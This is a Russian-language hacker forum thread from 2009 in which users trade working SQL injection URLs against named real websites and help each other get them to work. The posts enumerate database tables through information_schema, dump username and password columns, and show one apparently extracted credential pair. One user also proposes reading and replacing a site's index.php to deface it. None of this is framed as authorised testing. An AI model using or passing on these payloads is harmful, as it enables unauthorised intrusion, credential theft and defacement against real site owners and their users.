22.01.2009, 23:08
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index
Последний раз редактировалось sabe; 22.01.2009 в 23:40..
|
|
|
22.01.2009, 23:49
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,version(),user(),database())--
Не могу понять, нашел все таблицы, но ни в одну не пускает, может ктонить поможет? |
|
|
|
23.01.2009, 01:07
|
|
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
С нами:
9642449
Репутация:
606
|
|
Сообщение от sabe
попугай
да (
даже незнаю, вот есть идея.. через скулю прочесть index.php скопировать его и модифицировать под себя.. потом удалить index.php на сервере, и создать свой индекс... токо если есть права на запись... и возможно удалить index
как? получилось?)
|
|
|
|
23.01.2009, 08:34
|
|
Banned
Регистрация: 07.09.2008
Сообщений: 48
С нами:
9303416
Репутация:
-1
|
|
Сообщение от попугай
как? получилось?)
ребята подскажите кто-нить вот так выглядет сама сртpаничка
http://dwap.tj/chat/profile.php?id=1187&password=&ver=html
id= -1187&password=&ver=html
тут я ставлю минус между равно и 1187
и после как поставил минус выходит вот такая хринитень
Warning: mysql_result() [function.mysql-result]: Unable to jump to row 0 on MySQL result index 5 in /var/www/localhost/htdocs/dwap.tj/chat/profile.php on line 8
вопрос с могу я что-нить тут сделать,и как тут составить правильный запрос.
Последний раз редактировалось or1; 23.01.2009 в 08:40..
|
|
|
|
23.01.2009, 00:00
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
В каком плане "не пускает"?
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--
|
|
|
|
23.01.2009, 00:03
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Сообщение от R1dex
В каком плане "не пускает"?
Код:
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+noc--
у меня чето ошибку выдовала, хз почему, а эту таблицу ты как нарыл, через limit?
|
|
|
|
23.01.2009, 00:01
|
|
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
С нами:
10081287
Репутация:
568
|
|
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,table_schema,table_n ame)+from+information_schema.columns+where+column_ name+like+char(112,97,115,115)+limit+0,1--
например достаем таблу с пассами..
http://www.adilsoz.kz/site.php?lan=russian&id=207&newsid=-1+union+select+concat_ws(0x3a,name,pass)+from+adil soz.noc+limit+0,1--
осюда и вывод 
slava; 1234Slava1
|
|
|
|
23.01.2009, 00:05
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Да, через лимит.
Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"
|
|
|
|
23.01.2009, 00:17
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Сообщение от R1dex
Да, через лимит.
Возможно, ты не мог сделать вывод к примеру из "ibf_members". Это потому, что таблица лежит в другой бд, "forum.ibf_members"
Спасибо, большое! Все понял, а как часто вот так вот нужно к именам таблиц что-то добавлять, и как узнать что именно добавлять?
|
|
|
|
23.01.2009, 00:36
|
|
Познающий
Регистрация: 24.12.2008
Сообщений: 54
С нами:
9147012
Репутация:
9
|
|
Вот еще,
Код:
http://rabota.kz/candidates/vacancies.php?cat=123+order+by+2--
прекрассно видно что только два числа должны отображаться, а при вводе
Код:
http://rabota.kz/candidates/vacancies.php?cat=123+union+select+1,2--
выдает ошибку, объясните плз, где я ошибся? Заранее благодарен! |
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Комбинированный вид
